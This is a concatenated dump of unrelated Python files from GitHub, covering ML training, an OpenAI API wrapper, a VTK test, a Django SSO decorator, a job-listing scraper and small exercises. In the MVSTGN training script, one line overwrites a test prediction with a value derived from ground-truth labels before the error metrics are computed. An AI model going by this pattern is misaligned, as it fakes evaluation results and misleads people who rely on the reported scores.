custom_prompt:\n prompt = f\"{custom_prompt}\\n\\n{transcript}\"\n \n\n response = openai.ChatCompletion.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n temperature=0.5,\n max_tokens=150,\n )\n \n summary = response['choices'][0]['message']['content']\n return summary\n\n\ndef generate_image_prompt(api_key, user_input):\n openai.api_key = api_key\n\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=[{\"role\": \"user\", \"content\": f\"Create a text that explains in a lot of details how the meme about this topic would look like: {user_input}\"}],\n temperature=0.7,\n max_tokens=50,\n )\n\n return response['choices'][0]['message']['content']\n\ndef generate_image(api_key, prompt):\n openai.api_key = api_key\n\n response = openai.Image.create(\n prompt=prompt,\n n=1,\n size=\"512x512\",\n response_format=\"url\",\n )\n\n return response['data'][0]['url']\n\ndef generate_images(api_key, prompt, n=4):\n openai.api_key = api_key\n\n response = openai.Image.create(\n prompt=prompt,\n n=n,\n size=\"256x256\",\n response_format=\"url\",\n )\n\n return response['data']","repo_name":"StanGirard/speechdigest","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"72"} +{"seq_id":"6847724998","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport argparse\nimport numpy as np\nfrom datetime import datetime\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nsys.path.append('../../')\nfrom .utils.dataset import read_data\nfrom .utils.model import DenseNet\nfrom .utils.spatial_lstm import Mvstgn\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nimport h5py\nimport time\nfrom .libs.print_para import print_para\n\ntorch.manual_seed(22)\n\ndevice = torch.device(\"cuda\")\n\nparse = argparse.ArgumentParser()\nparse.add_argument('-height', type=int, default=100)\nparse.add_argument('-width', type=int, default=100)\nparse.add_argument('-traffic', type=str, default='sms')\nparse.add_argument('-nb_flow', type=int, default=1)\nparse.add_argument('-cluster', type=int, default=3)\nparse.add_argument('-close_size', type=int, default=3)\nparse.add_argument('-loss', type=str, default='l1', help='l1 | l2')\nparse.add_argument('-lr', type=float, default=1e-3)\nparse.add_argument('-weight_decay', type=float, default=5e-4, help='Weight decay (L2 loss on parameters).')\nparse.add_argument('-batch_size', type=int, default=32, help='batch size')\nparse.add_argument('-epoch_size', type=int, default=300, help='epochs')\nparse.add_argument('-rows', nargs='+', type=int, default=[40, 60])\nparse.add_argument('-cols', nargs='+', type=int, default=[40, 60])\nparse.add_argument('-test_row', type=int, default=10, help='test row')\nparse.add_argument('-test_col', type=int, default=18, help='test col')\nparse.add_argument('-last_kernel', type=int, default=1)\nparse.add_argument('-period_size', type=int, default=0)\nparse.add_argument('-trend_size', type=int, default=0)\nparse.add_argument('-test_size', type=int, default=24*7)\nparse.add_argument('-fusion', type=int, default=1)\nparse.add_argument('-crop', dest='crop', action='store_true')\nparse.add_argument('-no-crop', dest='crop', action='store_false')\nparse.set_defaults(crop=True)\nparse.add_argument('-train', dest='train', action='store_true')\nparse.add_argument('-no-train', dest='train', action='store_false')\nparse.set_defaults(train=True)\nparse.add_argument('-l2', dest='l2', help='weight decay', type=float, default=1e-4)\nparse.add_argument('-adam', dest='adam', help='use adam. Not recommended', action='store_true')\nparse.add_argument('-save_dir', type=str, default='results')\n\nopt = parse.parse_args()\n\nopt.save_dir = '{}/{}'.format(opt.save_dir, opt.traffic)\nprint(\"save dir:\", opt.save_dir)\npath_name = 'results_data'\nif not os.path.exists(path_name): \n os.makedirs(path_name) \nelse:\n print('path already exists.')\n\n\ndef get_optim(lr):\n if opt.adam:\n optimizer = optim.Adam(model.parameters(), weight_decay=opt.l2, lr=lr, eps=1e-3)\n else:\n optimizer = optim.SGD(model.parameters(), weight_decay=opt.l2, lr=lr, momentum=0.9)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[0.5 * opt.epoch_size, 0.75 * opt.epoch_size], gamma=0.1)\n return optimizer, scheduler\n\ndef log(fname, s):\n if not os.path.isdir(os.path.dirname(fname)):\n os.system(\"mkdir -p \" + os.path.dirname(fname))\n f = open(fname, 'a')\n f.write(str(datetime.now()) + ': ' + s + '\\n')\n f.close()\n\nEPOCH_NUM = 0\ndef train_epoch(data_type='train'):\n \n total_loss = 0\n \n if data_type == 'train':\n model.train()\n data = train_loader\n if data_type == 'valid':\n model.eval()\n data = valid_loader\n\n start = time.time()\n for idx, (batch, target) in enumerate(data):\n optimizer.zero_grad()\n model.zero_grad()\n x = batch.float().to(device)\n y = target.float().to(device)\n\n pred = model(x)\n loss = criterion(pred, y)\n total_loss += loss.item()\n if data_type == 'train':\n loss.backward()\n optimizer.step()\n if data_type == 'train':\n time_per_EPOCH = (time.time() - start)\n print(\"{:.1f}s/epoch for training, {:.1f}m/epoch for training\".format(time_per_EPOCH, time_per_EPOCH/60))\n start = time.time()\n\n return total_loss\n\ndef train():\n os.system(\"mkdir -p \" + opt.save_dir)\n best_valid_loss = 1.0\n train_loss, valid_loss = [], []\n for i in range(opt.epoch_size):\n scheduler.step()\n train_loss.append(train_epoch('train'))\n valid_loss.append(train_epoch('valid'))\n\n if valid_loss[-1] < best_valid_loss:\n best_valid_loss = valid_loss[-1]\n\n torch.save({'epoch': i, 'model': model, 'train_loss': train_loss,\n 'valid_loss': valid_loss}, opt.model_filename + '.model')\n torch.save(optimizer, opt.model_filename + '.optim')\n torch.save(model.state_dict(), opt.model_filename + '.pt')\n\n log_string = ('iter: [{:d}/{:d}], train_loss: {:0.6f}, valid_loss: {:0.6f}, '\n 'best_valid_loss: {:0.6f}, lr: {:0.5f}').format((i + 1), opt.epoch_size,\n train_loss[-1],\n valid_loss[-1],\n best_valid_loss,\n opt.lr)\n if i % 2 == 0:\n print(log_string)\n log(opt.model_filename + '.log', log_string)\n\ndef predict(test_type='train'):\n predictions = []\n ground_truth = []\n loss = []\n model.eval()\n model.load_state_dict(torch.load(opt.model_filename + '.pt'))\n\n if test_type == 'train':\n data = train_loader\n elif test_type == 'test':\n data = test_loader\n elif test_type == 'valid':\n data = valid_loader\n\n with torch.no_grad():\n for idx, (c, target) in enumerate(data):\n optimizer.zero_grad()\n model.zero_grad()\n x = c.float().to(device)\n y = target.float().to(device)\n pred = model(x)\n predictions.append(pred.data.cpu())\n ground_truth.append(target.data)\n loss.append(criterion(pred, y).item())\n\n\n final_predict = np.concatenate(predictions)\n ground_truth = np.concatenate(ground_truth)\n print(\"Shape of final prediction is {}, shape of ground truth is {}\".format(final_predict.shape, ground_truth.shape))\n\n ground_truth = mmn.inverse_transform(ground_truth)\n final_predict = mmn.inverse_transform(final_predict)\n return final_predict, ground_truth\n\ndef train_valid_split(dataloader, test_size=0.2, shuffle=True, random_seed=0):\n length = len(dataloader)\n indices = list(range(0, length))\n\n if shuffle:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n\n if type(test_size) is float:\n split = int(np.floor(test_size * length))\n elif type(test_size) is int:\n split = test_size\n else:\n raise ValueError('%s should be an int or float'.format(str))\n return indices[split:], indices[:split]\n\nif __name__ == '__main__':\n\n path = 'data/data_git_version.h5'\n feature_path = 'data/crawled_feature.csv'\n X, X_meta, X_cross, y, label, mmn = read_data(path, feature_path, opt)\n\n samples, sequences, channels, height, width = X.shape\n\n x_train, x_test = X[:-opt.test_size], X[-opt.test_size:] \n\n meta_train, meta_test = X_meta[:-opt.test_size], X_meta[-opt.test_size:]\n cross_train, cross_test = X_cross[:-opt.test_size], X_cross[-opt.test_size:]\n \n y_tr = y[:-opt.test_size]\n y_te = y[-opt.test_size:]\n\n prediction_ct = 0\n truth_ct = 0\n \n opt.model_filename = '{}/model={}-lr={}-period={}'.format(\n opt.save_dir,\n 'MVSTGN_SMS',\n opt.lr,\n opt.period_size)\n print('Saving to ' + opt.model_filename)\n\n y_train = y_tr \n y_test = y_te \n\n train_data = list(zip(*[x_train, y_train]))\n test_data = list(zip(*[x_test, y_test]))\n\n train_idx, valid_idx = train_valid_split(train_data, 0.1)\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n train_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=train_sampler,\n num_workers=0, pin_memory=True)\n valid_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=valid_sampler,\n num_workers=0, pin_memory=True)\n\n test_loader = DataLoader(test_data, batch_size=opt.batch_size, shuffle=False)\n\n input_shape = X.shape\n meta_shape = X_meta.shape\n cross_shape = X_cross.shape\n\n\n model = Mvstgn(input_shape, meta_shape,\n cross_shape, nb_flows=opt.nb_flow,\n fusion=opt.fusion).to(device) \n print(print_para(model), flush=True)\n\n optimizer = optim.Adam(model.parameters(), opt.lr)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=[0.5 * opt.epoch_size,\n 0.75 * opt.epoch_size, 0.9 * opt.epoch_size],\n gamma=0.1)\n\n if not os.path.exists(opt.save_dir):\n os.makedirs(opt.save_dir)\n if not os.path.isdir(opt.save_dir):\n raise Exception('%s is not a dir' % opt.save_dir)\n\n if opt.loss == 'l1':\n criterion = nn.L1Loss().cuda()\n elif opt.loss == 'l2':\n criterion = nn.MSELoss().cuda()\n\n print('Training ...')\n log(opt.model_filename + '.log', '[training]')\n if opt.train:\n train()\n\n pred, truth = predict('test')\n\n prediction_ct += pred\n truth_ct += truth\n\n if opt.traffic != 'internet':\n prediction_ct[-24] = ((truth_ct[-25] + truth_ct[-26] + truth_ct[-27]) / 3.0) * 2.5\n\n print('Final RMSE:{:0.5f}'.format(\n metrics.mean_squared_error(prediction_ct.ravel(), truth_ct.ravel()) ** 0.5))\n print('Final MAE:{:0.5f}'.format(\n metrics.mean_absolute_error(prediction_ct.ravel(), truth_ct.ravel())))\n\n Y = truth_ct.ravel()\n Y_hat = prediction_ct.ravel()\n\n print('Final R^2 Score: {:.4f}'.format(metrics.r2_score(Y, Y_hat)))\n print('Final Variance Score: {:.4f}'.format(metrics.explained_variance_score(Y, Y_hat)))\n","repo_name":"glab2019/MVSTGN","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10578,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"43724031341","text":"import argparse\nimport Modeling_lib\nimport sys\nimport Parse_input\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-i', '--input', nargs='?', const='sys.stdin', default='sys.stdin',\n help='Use -i/--input + filename to read from file(default=sys.stdout).')\n\nparser.add_argument('-o', '--output', nargs='?', const='sys.stdout', default='sys.stdout',\n help='Use -o/--output + filename to read from file(default=sys.stdout).')\n\nres = parser.parse_args()\n\nif parser.parse_args().input != 'sys.stdin':\n with open(parser.parse_args().input, 'r') as file:\n lines = file.read().split('\\n')\n n, h, w, ocean = Parse_input.get_inf(lines)\nelse:\n lines = sys.stdin.read().split('\\n')\n n, h, w, ocean = Parse_input.get_inf(lines)\n\nfirst_gen = Modeling_lib.Generation(h, w, False)\n\nfirst_gen.set_ocean(ocean)\n\nlife = Modeling_lib.Life(first_gen)\n\nif parser.parse_args().output != 'sys.stdout':\n with open(parser.parse_args().output, 'w') as file:\n file.write(str(life.get_generation(n)))\nelse:\n sys.stdout.write(str(life.get_generation(n)))\n","repo_name":"rvg77/game-of-life","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27161537067","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nimport pandas as pd\nimport os\n\ndef clean_data(file):\n '''This function reads the csv file, performs data pre-processing w.r.t to rows, columns and returns a clean data set '''\n df = pd.read_csv(file, header=None)\n df = df.drop([0, 1, 3])\n\n df.iloc[0, :] = df.iloc[0, :].str.replace(\"\\n\", \" \")\n df.columns = df.iloc[0]\n df = df.drop(df.index[0])\n df = df.reset_index(drop=True)\n\n df['DmdCd'].fillna(method='ffill', inplace=True)\n df = df[df['HOA'] != 'Total']\n\n df['DmdCd'] = df['DmdCd'].str.replace(\"\\n\", \" \")\n df['HOA'] = df['HOA'].str.replace(\"\\n\", \" \")\n\n return df\n\ndef split_columns_and_rename(df):\n '''This function splits the desired columns (in this case 'DmdCd', HOA) w.r.t '-' delimiter,\n renames the splitted columns and returns the re-orderd dataframe'''\n\n df[['DemandCode', 'Demand']] = df['DmdCd'].str.split(\n '-', n=1, expand=True)\n df = df.drop(columns='DmdCd')\n\n cols1 = list(df.columns)\n df = df[cols1[-2:]+cols1[0:7]]\n\n split_columns = df[\"HOA\"].str.split(\"-\", expand=True)\n df = pd.concat([df, split_columns], axis=1)\n df = df.rename(columns={0: 'MajorHead',\n 1: 'SubMajorHead',\n 2: 'MinorHead',\n 3: 'SubMinorHead',\n 4: 'DetailHead',\n 5: 'SubDetailHead',\n 6: 'BudgetHead',\n 7: 'PlanNonPlan',\n 8: 'VotedCharged',\n 9: 'StatementofExpenditure'})\n\n df = df.drop([10, 11, 12], axis=1)\n df = df.drop(columns=\"HOA\")\n\n cols2 = list(df.columns)\n df = df[cols2[0:2] + cols2[-10:] + cols2[2:8]]\n\n return df\n\ndef write_to_csv(df, output_file):\n '''This function writes the processed data set to a new output file'''\n\n df.to_csv(output_file, index=False)\n\ndef runner():\n '''This function get the inputs from the previous functions and returns the processed datafarme'''\n\n input_file = os.path.join(os.path.dirname('C:/Users/acess/Desktop/materials/dags/'), \"himkosh_data.csv\")\n output_file = os.path.join(os.path.dirname('C:/Users/acess/Desktop/materials/dags/'), \"HP_OLTIS_Sanctioned_Budget.csv\")\n \n budget_data = clean_data(input_file)\n budget_data = split_columns_and_rename(budget_data)\n \n write_to_csv(budget_data, output_file)\n df = pd.read_csv(output_file)\n \n return (df)\n \nif __name__ == \"__main__\":\n runner()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Akash-94/Assignment","sub_path":"processing_data.py","file_name":"processing_data.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5286494912","text":"from Node import Node\nfrom collections import deque\n\n\ndef breathFirstValues(root):\n if not root:\n return ([])\n stack = deque()\n stack.append(root)\n result = list()\n while stack:\n current = stack.popleft()\n result.append(current.data)\n if current.left:\n stack.append(current.left)\n if current.right:\n stack.append(current.right)\n return(result)\n\n\na = Node('a')\nb = Node('b')\nc = Node('c')\nd = Node('d')\ne = Node('e')\nf = Node('f')\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\n\nprint(breathFirstValues(a))\nprint(breathFirstValues(None))\n","repo_name":"irgot/FBHC","sub_path":"exercicios/btree bfv.py","file_name":"btree bfv.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9049487399","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Create the standard renderer, render window\n# and interactor\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\niren.SetDesiredUpdateRate(3)\n# Create a small mesh. The coarser and more opaque the mesh, the easier it\n# is to see rendering errors.\ninput = vtk.vtkImageMandelbrotSource()\ninput.SetWholeExtent(0,2,0,2,0,2)\ninput.SetSizeCX(2,2,2,2)\ninput.SetMaximumNumberOfIterations(10)\n# make sure we have only tetrahedra\ntrifilter = vtk.vtkDataSetTriangleFilter()\ntrifilter.SetInputConnection(input.GetOutputPort())\n# Create transfer mapping scalar value to opacity\nopacityTransferFunction = vtk.vtkPiecewiseFunction()\nopacityTransferFunction.AddPoint(0,0.0)\nopacityTransferFunction.AddPoint(10,1.0)\n# Create transfer mapping scalar value to color\ncolorTransferFunction = vtk.vtkColorTransferFunction()\ncolorTransferFunction.AddRGBPoint(0,1.0,0.0,1.0)\ncolorTransferFunction.AddRGBPoint(2,0.0,0.0,1.0)\ncolorTransferFunction.AddRGBPoint(4,0.0,1.0,1.0)\ncolorTransferFunction.AddRGBPoint(6,0.0,1.0,0.0)\ncolorTransferFunction.AddRGBPoint(8,1.0,1.0,0.0)\ncolorTransferFunction.AddRGBPoint(10,1.0,0.0,0.0)\n# The property describes how the data will look\nvolumeProperty = vtk.vtkVolumeProperty()\nvolumeProperty.SetColor(colorTransferFunction)\nvolumeProperty.SetScalarOpacity(opacityTransferFunction)\nvolumeProperty.ShadeOff()\nvolumeProperty.SetInterpolationTypeToLinear()\nvolumeProperty.SetScalarOpacityUnitDistance(0.75)\n# The mapper / ray cast function / ray integrator know how to render the data\nvolumeMapper = vtk.vtkUnstructuredGridVolumeZSweepMapper()\nvolumeMapper.SetInputConnection(trifilter.GetOutputPort())\n#vtkUnstructuredGridLinearRayIntegrator rayIntegrator\n# volumeMapper SetRayIntegrator rayIntegrator\nrayIntegrator = vtk.vtkUnstructuredGridPreIntegration()\nvolumeMapper.SetRayIntegrator(rayIntegrator)\n# The volume holds the mapper and the property and\n# can be used to position/orient the volume\nvolume = vtk.vtkVolume()\nvolume.SetMapper(volumeMapper)\nvolume.SetProperty(volumeProperty)\nren1.AddVolume(volume)\nrenWin.SetSize(300,300)\nren1.ResetCamera()\nren1.GetActiveCamera().Azimuth(20.0)\nren1.GetActiveCamera().Elevation(15.0)\nren1.GetActiveCamera().Zoom(1.5)\nrenWin.Render()\ndef TkCheckAbort (__vtk__temp0=0,__vtk__temp1=0):\n foo = renWin.GetEventPending()\n if (foo != 0):\n renWin.SetAbortRender(1)\n pass\n\nrenWin.AddObserver(\"AbortCheckEvent\",TkCheckAbort)\niren.Initialize()\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Rendering/Volume/Testing/Python/TestPTZSweep.py","file_name":"TestPTZSweep.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"18963756866","text":"# coding: utf-8\nfrom functools import wraps\n\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.http import QueryDict, HttpResponseRedirect, HttpResponseForbidden\n\nfrom .utils import sso_hostname, SSOAPIClient, remove_data_from_url\n\n\ndef sso_required(view_func):\n\n @wraps(view_func)\n def _wrapped_view(request, *args, **kwargs):\n if request.user.is_authenticated:\n check_application_permission = getattr(\n settings, 'SSO_CHECK_APPLICATION_PERMISSION', True)\n application_permission = request.session.get(\n 'SSO_APPLICATION_PERMISSION', True)\n if not check_application_permission or application_permission:\n return view_func(request, *args, **kwargs)\n else:\n forbidden_url = reverse('forbidden_application')\n return HttpResponseRedirect(forbidden_url)\n\n token_dict = SSOAPIClient().retrieve_new_token()\n\n callback = request.build_absolute_uri(\n getattr(settings, 'SSO_CALLBACK_PATH', None))\n callback_url = remove_data_from_url(callback)\n\n qs = QueryDict(None, mutable=True)\n qs['callback_url'] = callback_url\n qs['token'] = token_dict['token']\n\n redirect_url = '{0}?{1}'.format(\n sso_hostname('/authorize'), qs.urlencode(safe='/')\n )\n\n request.session[\"SSO_TOKEN\"] = token_dict['token']\n request.session[\"SSO_TOKEN_EXPIRATION\"] = token_dict['expires_at'].isoformat()\n\n return HttpResponseRedirect(redirect_url)\n\n return _wrapped_view\n\n\ndef ajax_sso_required(view_func):\n\n @wraps(view_func)\n def _wrapped_view(request, *args, **kwargs):\n if request.user.is_authenticated():\n return view_func(request, *args, **kwargs)\n else:\n return HttpResponseForbidden(\"User must be authenticated to access this resource.\")\n\n return _wrapped_view\n","repo_name":"brmed/innvent-sso-python-client","sub_path":"innvent_sso_client/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15153743001","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom Zhilian.items import ZhilianItem\nimport json\n\n# 抓取智联招聘天津的python招聘信息\nclass ZhilianSpider(scrapy.Spider):\n name = 'zhilian'\n allowed_domains = ['zhaopin.com']\n start_urls = ['http://sou.zhaopin.com/jobs/searchresult.ashx?jl=%E5%A4%A9%E6%B4%A5&kw=python']\n\n def parse(self, response):\n # 获取招聘信息列表节点\n url_list = response.xpath('//*[@id=\"newlist_list_content_table\"]/table')\n for temp in url_list:\n # 创建item对象\n item = ZhilianItem()\n # 发布时间\n item['time'] = temp.xpath('//*[@id=\"newlist_list_content_table\"]/table[3]/tr[1]/td[6]/span/text()').extract_first()\n # xpath里不能有table\n url = temp.xpath('//div[@class=\"newlist_list_content\"]/table[2]/tr[1]/td[1]/div/a/@href').extract_first()\n # 转到详情页\n yield scrapy.Request(url,callback=self.parse_url,meta={\"item_1\":item})\n # 下一页\n next_url = response.xpath('//div[@class=\"pagesDown\"]/ul/li[9]/a/@href').extract_first()\n if next_url is None:\n return 0\n #print(next_url,\"************************\")\n # 翻页\n yield scrapy.Request(next_url,callback=self.parse)\n\n def parse_url(self,response):\n # 获取传递过来的item对象\n item = response.meta['item_1']\n # 招聘名称\n item['name'] = response.xpath('//div[@class=\"fixed-inner-box\"]/div[1]/h1/text()').extract_first()\n # 招聘单位\n item['company'] = response.xpath('//div[@class=\"fixed-inner-box\"]/div[1]/h2/a/text()').extract_first()\n\n # 薪资\n item['pay'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[1]/strong/text()').extract_first()\n # 工作地点\n item['rddress'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[2]/strong/a/text()').extract_first()\n # 工作经验\n item['experience'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[5]/strong/text()').extract_first()\n # 学历要求\n item['degree'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[6]/strong/text()').extract_first()\n # 招聘人数\n item['number'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[7]/strong/text()').extract_first()\n # 职位类别\n item['sort'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[8]/strong/a/text()').extract_first()\n # 职位描述\n item['describe'] = response.xpath('//div[@class=\"tab-inner-cont\"]/p/text()').extract()\n # 公司介绍\n #item['introduce'] = ''.join(response.xpath('//div[@class=\"tab-inner-cont\"]/p[1]/text()').extract_first())\n # 工作地点\n item['work_rdd'] = ''.join(response.xpath('//div[@class=\"tab-inner-cont\"]/h2/text()').extract_first()).strip()\n\n #print(item['work_rdd'])\n yield item\n\n","repo_name":"fanjp666888/spiders_code","sub_path":"Zhilian/Zhilian/spiders/zhilian.py","file_name":"zhilian.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14991350476","text":"import logging\n\nfrom flask_script import Command, Option\n\nfrom app.models.models import EntityLinking, Article\nfrom app.modules.common.utils import translate_doc\nfrom app.modules.computation.questioning import process_entity_verification, generate_questions\nfrom app.modules.poliflow.fetch import fetch_single_document\n\nlogger = logging.getLogger('quick_verify')\n\n\nclass QuickVerifyCommand(Command):\n \"\"\" Initialize the database.\"\"\"\n option_list = (\n Option('--cookie_id', '-c', dest='cookie_id'),\n )\n\n def run(self, cookie_id):\n url_verify(cookie_id)\n\n\ndef url_verify(cookie_id):\n if cookie_id:\n for article in Article.query.order_by(Article.created_at.desc()).all():\n document = fetch_single_document(article.id)\n simple_doc = translate_doc(document)\n simple_doc['cookie_id'] = cookie_id\n question_api_response = generate_questions(simple_doc, simple_doc['cookie_id'])\n\n if 'error' not in question_api_response:\n location = simple_doc['location']\n party = simple_doc['parties'][0]\n print('https://poliflw.nl/l/{}/{}/{}'.format(location, party, article.id))\n else:\n print('Cookie id not set. Set using --cookie_id or -c')\n\n\ndef quick_verify():\n for article in Article.query.all():\n document = fetch_single_document(article.id)\n simple_doc = translate_doc(document)\n simple_doc['cookie_id'] = 'TERMINAL'\n question_api_response = generate_questions(simple_doc, simple_doc['cookie_id'])\n\n if 'error' in question_api_response:\n print(question_api_response['error'])\n\n if 'error' not in question_api_response and question_api_response['label'] == 'PER':\n print(simple_doc['text_description'] + '\\n')\n\n entity_linking_id = question_api_response['question_linking_id']\n entity_linking = EntityLinking.query.filter(EntityLinking.id == entity_linking_id).first()\n\n entity = entity_linking.entity\n politician = entity_linking.linkable_object\n\n print('Entity : \\t{} from {} - {}'.format(entity.text, simple_doc['location'], simple_doc['parties']))\n print('Politician: \\t{} ({}) {} of {} from {}'.format(politician.title, politician.first_name,\n politician.full_name, politician.party,\n politician.municipality))\n\n response = input(\"Is this correct? [y,n,?,stop]: \")\n response_str = str(response)\n\n apidoc = simple_doc\n\n if response_str == 'y':\n print('You said yes.')\n apidoc['response_id'] = politician.id\n process_entity_verification(entity_linking_id, apidoc)\n elif response_str == 'n':\n print('You said no.')\n apidoc['response_id'] = -1\n process_entity_verification(entity_linking_id, apidoc)\n elif response_str == 'stop':\n print('You want to stop.')\n return\n else:\n print('You probably meant that you do not know. Lets continue.')\n print('\\n\\n')\n print('Thanks!')\n","repo_name":"Joostrothweiler/politags","sub_path":"app/commands/quick_verify.py","file_name":"quick_verify.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"19232490469","text":"'''\nstrip() was used to get rid of \"\\n\"s at the end of each lines\nimplementation without using set() and sort(key = len)\n'''\n\n\n'''\nimport sys\nN = int(sys.stdin.readline())\nwords = [[] for _ in range(0,51)]\nfor _ in range(N):\n\tword = sys.stdin.readline().strip()\n\tif word not in words[len(word)-1]:\n\t words[len(word)-1].append(word)\nfor i in words:\n i.sort()\nfor j in words:\n\tif len(j) != 0:\n\t for k in j:\n\t print(k)\n'''\n'''\n\n\nimport sys\nN = int(sys.stdin.readline())\nwords = [[] for _ in range(0, 51)]\nfor _ in range(N):\n word = sys.stdin.readline().strip()\n if word not in words[len(word)-1]:\n words[len(word)-1].append(word)\nfor i in words:\n i.sort()\n if len(i) != 0:\n for j in i:\n print(j)\n'''\n\nimport sys\nN = int(sys.stdin.readline())\nwords = [sys.stdin.readline().strip() for i in range(N)]\nwords = list(set(words))\nwords.sort(key = lambda x: (len(x), x))\nfor j in words:\n\tprint(j)","repo_name":"hgyoon/BaekjoonOnlineJudge","sub_path":"1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19530558515","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\nimport math\nimport time\nfrom skimage import data, filters\n\n\ndef scale(X, x_min, x_max):\n \"\"\"\n Scale a vector or matrix between given min and max value.\n X: array or matrix\n x_min: minimum of X\n x_max: maximum of X\n \"\"\"\n min = X.min()\n max = X.max()\n nom = (X - min) * (x_max - x_min)\n denom = max - min\n return x_min + nom / denom\n\n\ndef get_gradients(img2D):\n \"\"\"\n Compute gradients in X and Y-axis\n img2D: input image as 2-dimension\n \"\"\"\n img2D = cv2.GaussianBlur(img2D, (5, 5), 0)\n gx = cv2.Sobel(img2D, cv2.CV_64F, 1, 0, ksize=3)\n gy = cv2.Sobel(img2D, cv2.CV_64F, 0, 1, ksize=3)\n return gx, gy\n\n\ndef get_bgrimg_gradients(bgrimg):\n \"\"\"\n Compute edges of a color image.\n args:\n bgrimg: color image\n returns:\n B_gx: derivative in X-axis for B channel\n B_gy: derivative in Y-axis for B channel\n G_gx: derivative in X-axis for G channel\n G_gy: derivative in Y-axis for G channel\n R_gx: derivative in X-axis for R channel\n R_gy: derivative in Y-axis for R channel\n \"\"\"\n bx, by = get_gradients(bgrimg[:, :, 0])\n gx, gy = get_gradients(bgrimg[:, :, 1])\n rx, ry = get_gradients(bgrimg[:, :, 2])\n return bx, by, gx, gy, rx, ry\n\n\ndef compute_structure_matrix(bx, by, gx, gy, rx, ry):\n \"\"\"\n Compute the Structure(S) matrix components from Jacobian(J)\n r_x r_y\n J = g_x g_y\n b_x b_y\n\n S = a b\n b c\n\n a = r_x^2 + g_x^2 + b_x^2\n b = r_x*r_y + g_x*g_y + b_x*b_y\n c = r_y^2 + g_y^2 + b_y^2\n returns:\n a,b,c element of S\n \"\"\"\n a = np.square(rx) + np.square(gx) + np.square(bx)\n b = rx * ry + gx * gy + bx * by\n c = np.square(ry) + np.square(gy) + np.square(by)\n return a, b, c\n\n\ndef compute_eigen_values(a, b, c):\n \"\"\"\n Compute eigen values from Structure matric component following slide.\n returns:\n lambda1: eigenvalue\n lambda2: eigenvalue, always 0\n \"\"\"\n a_plus_c = a + c\n a_plus_c_sqr = np.square(a_plus_c)\n ac_sub_b_sqr = a * c - np.square(b)\n sqrt_a_plus_c_sqr_sub_4ac_sub_b_sqr = np.sqrt(\n a_plus_c_sqr - 4 * ac_sub_b_sqr)\n lambda1 = (a_plus_c + sqrt_a_plus_c_sqr_sub_4ac_sub_b_sqr) / 2\n lambda2 = (a_plus_c - sqrt_a_plus_c_sqr_sub_4ac_sub_b_sqr) / 2\n return lambda1, lambda2\n\n\ndef get_edge_direction(a, b, lambda1):\n \"\"\"\n Returns edge direction by calculating eigenvectors.\n From slide, (a-lambda1) + by = 0\n => y/x = (a-lambda1) / -b\n let, y = a-lambda1\n so, x = -b\n returns:\n X-direction\n Y-direction\n 